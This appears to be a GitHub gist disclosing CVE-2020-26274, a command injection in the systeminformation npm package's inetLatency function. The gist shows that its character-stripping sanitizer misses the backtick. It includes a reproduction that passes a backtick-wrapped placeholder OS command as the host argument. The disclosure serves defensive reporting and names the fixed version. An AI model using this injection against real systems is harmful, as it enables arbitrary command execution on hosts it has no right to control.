@EffectRenan
Last active December 19, 2020 22:51
[systeminformation] - Command Injection

Vulnerability: Command Injection - CVE-2020-26274

Package name: systeminformation.

Tested package versions: 4.31.0.

Fixed package versions: >= 4.31.1.

Description: The host argument is concatenated into a shell command after a blacklist-based sanitizer. The sanitizer does not strip the backtick, so an attacker who controls the host string can wrap an OS command in backticks (shell command substitution) and it is executed.

Affected file: lib/internet.js (inetLatency).

The sanitizeShellString function strips the characters listed below, but the backtick is not among them (note the '˚', U+02DA RING ABOVE, where a backtick would be expected), so a backtick-wrapped command passes through unchanged:

s[i] === '>' ||
s[i] === '<' ||
s[i] === '*' ||
s[i] === '?' ||
s[i] === '[' ||
s[i] === ']' ||
s[i] === '|' ||
s[i] === '˚' ||   // U+02DA RING ABOVE, not the backtick '`'
s[i] === '$' ||
s[i] === ';' ||
s[i] === '&' ||
s[i] === '(' ||
s[i] === ')' ||
s[i] === ']' ||   // duplicate of the ']' check above
s[i] === '#' ||
s[i] === '\\' ||
s[i] === '\t' ||
s[i] === '\n' ||
s[i] === '"'      // no check for '`', so command substitution survives

Steps to reproduce:

const si = require('systeminformation');
si.inetLatency("`<OS command>`");